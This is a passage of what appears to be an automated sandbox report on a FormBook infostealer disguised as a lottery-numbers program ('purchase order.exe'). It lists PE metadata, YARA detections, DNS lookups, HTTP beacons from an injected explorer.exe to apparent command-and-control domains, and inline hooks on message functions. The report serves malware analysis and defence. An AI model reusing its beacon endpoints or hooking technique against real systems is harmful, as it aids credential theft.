                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xdee340x57.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe00000x610.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe20000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xdce940xdd000False0.670616736779data7.23319521913IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xe00000x6100x800False0.33203125data3.44771191569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xe20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0xe00a00x380data
                                                    RT_MANIFEST0xe04200x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright Hewlett-Packard 2017
                                                    Assembly Version1.0.0.0
                                                    InternalNameL6HC.exe
                                                    FileVersion1.0.0.0
                                                    CompanyNameHewlett-Packard
                                                    LegalTrademarks
                                                    Comments
                                                    ProductNameArizona Lottery Numbers
                                                    ProductVersion1.0.0.0
                                                    FileDescriptionArizona Lottery Numbers
                                                    OriginalFilenameL6HC.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    11/26/20-08:35:59.647235TCP1201ATTACK-RESPONSES 403 Forbidden804975034.102.136.180192.168.2.6

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 26, 2020 08:35:59.515651941 CET4975080192.168.2.634.102.136.180
                                                    Nov 26, 2020 08:35:59.532067060 CET804975034.102.136.180192.168.2.6
                                                    Nov 26, 2020 08:35:59.532291889 CET4975080192.168.2.634.102.136.180
                                                    Nov 26, 2020 08:35:59.532458067 CET4975080192.168.2.634.102.136.180
                                                    Nov 26, 2020 08:35:59.548866034 CET804975034.102.136.180192.168.2.6
                                                    Nov 26, 2020 08:35:59.647234917 CET804975034.102.136.180192.168.2.6
                                                    Nov 26, 2020 08:35:59.647254944 CET804975034.102.136.180192.168.2.6
                                                    Nov 26, 2020 08:35:59.647403002 CET4975080192.168.2.634.102.136.180
                                                    Nov 26, 2020 08:35:59.647483110 CET4975080192.168.2.634.102.136.180
                                                    Nov 26, 2020 08:35:59.663825989 CET804975034.102.136.180192.168.2.6
                                                    Nov 26, 2020 08:36:19.929287910 CET4975480192.168.2.6192.252.210.84
                                                    Nov 26, 2020 08:36:20.048827887 CET8049754192.252.210.84192.168.2.6
                                                    Nov 26, 2020 08:36:20.049011946 CET4975480192.168.2.6192.252.210.84
                                                    Nov 26, 2020 08:36:20.049163103 CET4975480192.168.2.6192.252.210.84
                                                    Nov 26, 2020 08:36:20.175694942 CET8049754192.252.210.84192.168.2.6
                                                    Nov 26, 2020 08:36:20.176032066 CET8049754192.252.210.84192.168.2.6
                                                    Nov 26, 2020 08:36:20.176084995 CET8049754192.252.210.84192.168.2.6
                                                    Nov 26, 2020 08:36:20.176456928 CET4975480192.168.2.6192.252.210.84
                                                    Nov 26, 2020 08:36:20.176614046 CET4975480192.168.2.6192.252.210.84
                                                    Nov 26, 2020 08:36:20.295711994 CET8049754192.252.210.84192.168.2.6
                                                    Nov 26, 2020 08:36:42.729172945 CET4975980192.168.2.6154.3.112.106
                                                    Nov 26, 2020 08:36:42.934798956 CET8049759154.3.112.106192.168.2.6
                                                    Nov 26, 2020 08:36:42.934915066 CET4975980192.168.2.6154.3.112.106
                                                    Nov 26, 2020 08:36:42.935230017 CET4975980192.168.2.6154.3.112.106
                                                    Nov 26, 2020 08:36:43.141685009 CET8049759154.3.112.106192.168.2.6
                                                    Nov 26, 2020 08:36:43.141709089 CET8049759154.3.112.106192.168.2.6
                                                    Nov 26, 2020 08:36:43.141876936 CET4975980192.168.2.6154.3.112.106
                                                    Nov 26, 2020 08:36:43.141932011 CET4975980192.168.2.6154.3.112.106
                                                    Nov 26, 2020 08:36:43.347218037 CET8049759154.3.112.106192.168.2.6

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 26, 2020 08:34:44.626146078 CET5177453192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:34:44.653296947 CET53517748.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:34:45.335278988 CET5602353192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:34:45.362344980 CET53560238.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:01.675477028 CET5838453192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:01.702729940 CET53583848.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:09.069878101 CET6026153192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:09.105495930 CET53602618.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:09.939351082 CET5606153192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:09.974968910 CET53560618.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:11.069233894 CET5833653192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:11.096440077 CET53583368.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:12.292821884 CET5378153192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:12.328258038 CET53537818.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:12.982487917 CET5406453192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:13.009586096 CET53540648.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:13.650024891 CET5281153192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:13.676914930 CET53528118.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:14.299649954 CET5529953192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:14.334978104 CET53552998.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:15.348972082 CET6374553192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:15.376084089 CET53637458.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:15.405502081 CET5005553192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:15.432632923 CET53500558.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:29.399007082 CET6137453192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:29.426244020 CET53613748.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:34.050090075 CET5033953192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:34.086786985 CET53503398.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:34.133965015 CET6330753192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:34.171108007 CET53633078.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:38.677284956 CET4969453192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:38.728715897 CET53496948.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:39.989021063 CET5498253192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:40.016082048 CET53549828.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:41.347407103 CET5001053192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:41.382834911 CET53500108.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:42.413922071 CET6371853192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:42.449481010 CET53637188.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:43.146209955 CET6211653192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:43.181716919 CET53621168.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:43.229849100 CET6381653192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:43.265134096 CET53638168.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:44.003971100 CET5501453192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:44.031021118 CET53550148.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:44.355125904 CET6220853192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:44.390340090 CET53622088.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:44.480305910 CET5757453192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:44.507337093 CET53575748.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:44.810081005 CET5181853192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:44.845542908 CET53518188.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:45.539169073 CET5662853192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:45.566215992 CET53566288.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:46.001442909 CET6077853192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:46.036811113 CET53607788.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:47.784264088 CET5379953192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:47.811352968 CET53537998.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:48.411068916 CET5468353192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:48.448807001 CET53546838.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:48.865490913 CET5932953192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:48.901052952 CET53593298.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:49.064623117 CET6402153192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:49.091680050 CET53640218.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:51.457932949 CET5612953192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:51.503340960 CET53561298.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:53.236346006 CET5817753192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:53.275296926 CET53581778.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:35:59.462236881 CET5070053192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:35:59.508137941 CET53507008.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:36:18.349651098 CET5406953192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:36:18.386487961 CET53540698.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:36:19.859580994 CET6117853192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:36:19.926716089 CET53611788.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:36:23.179485083 CET5701753192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:36:23.206470013 CET53570178.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:36:24.202011108 CET5632753192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:36:24.254543066 CET53563278.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:36:26.727475882 CET5024353192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:36:26.763277054 CET53502438.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:36:42.501482010 CET6205553192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:36:42.727859020 CET53620558.8.8.8192.168.2.6
                                                    Nov 26, 2020 08:37:03.285170078 CET6124953192.168.2.68.8.8.8
                                                    Nov 26, 2020 08:37:03.326234102 CET53612498.8.8.8192.168.2.6

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Nov 26, 2020 08:35:51.457932949 CET192.168.2.68.8.8.80x76aaStandard query (0)g.msn.comA (IP address)IN (0x0001)
                                                    Nov 26, 2020 08:35:59.462236881 CET192.168.2.68.8.8.80x23efStandard query (0)www.rettexo.comA (IP address)IN (0x0001)
                                                    Nov 26, 2020 08:36:19.859580994 CET192.168.2.68.8.8.80x6c33Standard query (0)www.makgxoimisitzer.infoA (IP address)IN (0x0001)
                                                    Nov 26, 2020 08:36:26.727475882 CET192.168.2.68.8.8.80x13d5Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                                    Nov 26, 2020 08:36:42.501482010 CET192.168.2.68.8.8.80x5c12Standard query (0)www.purehempbotanicalsinfo.comA (IP address)IN (0x0001)
                                                    Nov 26, 2020 08:37:03.285170078 CET192.168.2.68.8.8.80xe22cStandard query (0)www.keystonefulfillment.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Nov 26, 2020 08:35:51.503340960 CET8.8.8.8192.168.2.60x76aaNo error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                    Nov 26, 2020 08:35:59.508137941 CET8.8.8.8192.168.2.60x23efNo error (0)www.rettexo.comrettexo.comCNAME (Canonical name)IN (0x0001)
                                                    Nov 26, 2020 08:35:59.508137941 CET8.8.8.8192.168.2.60x23efNo error (0)rettexo.com34.102.136.180A (IP address)IN (0x0001)
                                                    Nov 26, 2020 08:36:19.926716089 CET8.8.8.8192.168.2.60x6c33No error (0)www.makgxoimisitzer.infomakgxoimisitzer.infoCNAME (Canonical name)IN (0x0001)
                                                    Nov 26, 2020 08:36:19.926716089 CET8.8.8.8192.168.2.60x6c33No error (0)makgxoimisitzer.info192.252.210.84A (IP address)IN (0x0001)
                                                    Nov 26, 2020 08:36:26.763277054 CET8.8.8.8192.168.2.60x13d5No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                    Nov 26, 2020 08:36:42.727859020 CET8.8.8.8192.168.2.60x5c12No error (0)www.purehempbotanicalsinfo.compurehempbotanicalsinfo.comCNAME (Canonical name)IN (0x0001)
                                                    Nov 26, 2020 08:36:42.727859020 CET8.8.8.8192.168.2.60x5c12No error (0)purehempbotanicalsinfo.com154.3.112.106A (IP address)IN (0x0001)
                                                    Nov 26, 2020 08:36:42.727859020 CET8.8.8.8192.168.2.60x5c12No error (0)purehempbotanicalsinfo.com154.3.112.107A (IP address)IN (0x0001)
                                                    Nov 26, 2020 08:37:03.326234102 CET8.8.8.8192.168.2.60xe22cNo error (0)www.keystonefulfillment.com52.58.78.16A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.rettexo.com
                                                    • www.makgxoimisitzer.info
                                                    • www.purehempbotanicalsinfo.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.64975034.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 26, 2020 08:35:59.532458067 CET4462OUTGET /sbmh/?0PJtBJ=kHp9H1tPAFmVsD64lxBGFA2zeARzx9tS7bJBiT/v97zwTY8F+uE1Nk95aq19aJdA0x4qnOoYAg==&jDHXG=aFNTklSp HTTP/1.1
                                                    Host: www.rettexo.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 26, 2020 08:35:59.647234917 CET4463INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Thu, 26 Nov 2020 07:35:59 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "5fb7c9ca-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.649754192.252.210.8480C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 26, 2020 08:36:20.049163103 CET4473OUTGET /sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp HTTP/1.1
                                                    Host: www.makgxoimisitzer.info
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 26, 2020 08:36:20.176032066 CET4474INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Content-Length: 706
                                                    Date: Thu, 26 Nov 2020 07:36:20 GMT
                                                    Server: LiteSpeed
                                                    Location: https://www.makgxoimisitzer.info/sbmh/?0PJtBJ=XEJriTYCOuK+SyY/9HWJgPQ+bcG3K3zE43eWtlfOSAWdxw4RjD6D9w7NiRikfKNtMf925IUbyw==&jDHXG=aFNTklSp
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.649759154.3.112.10680C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 26, 2020 08:36:42.935230017 CET4532OUTGET /sbmh/?0PJtBJ=h/URaQ6chuqxS5rd6TDMT0L901DFCS1Z5y5lZa0zhzexAXZp9SqL0GSPheeJSC1M62VUMIayeg==&jDHXG=aFNTklSp HTTP/1.1
                                                    Host: www.purehempbotanicalsinfo.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Nov 26, 2020 08:36:43.141685009 CET4533INHTTP/1.1 200 OK
                                                    Date: Thu, 26 Nov 2020 15:36:43 GMT
                                                    Server: Apache
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Status: 304
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

                                                    Function NameHook TypeActive in Processes
                                                    PeekMessageAINLINEexplorer.exe
                                                    PeekMessageWINLINEexplorer.exe
                                                    GetMessageWINLINEexplorer.exe
                                                    GetMessageAINLINEexplorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
                                                    Function NameHook TypeNew Data
                                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEE
                                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEE
                                                    GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xEE
                                                    GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xEE

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: purchase order.exe PID: 3900 Parent PID: 5904

                                                    General

                                                    Start time:08:34:50
                                                    Start date:26/11/2020
                                                    Path:C:\Users\user\Desktop\purchase order.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\purchase order.exe'
                                                    Imagebase:0x8d0000
                                                    File size:908288 bytes
                                                    MD5 hash:975187A07455D3CBF38EC878D893B490
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: purchase order.exe PID: 4672 Parent PID: 3900

                                                    General

                                                    Start time:08:34:59
                                                    Start date:26/11/2020
                                                    Path:C:\Users\user\Desktop\purchase order.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\purchase order.exe
                                                    Imagebase:0xbf0000
                                                    File size:908288 bytes
                                                    MD5 hash:975187A07455D3CBF38EC878D893B490
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: explorer.exe PID: 3440 Parent PID: 4672

                                                    General

                                                    Start time:08:35:01
                                                    Start date:26/11/2020
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:
                                                    Imagebase:0x7ff6f22f0000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
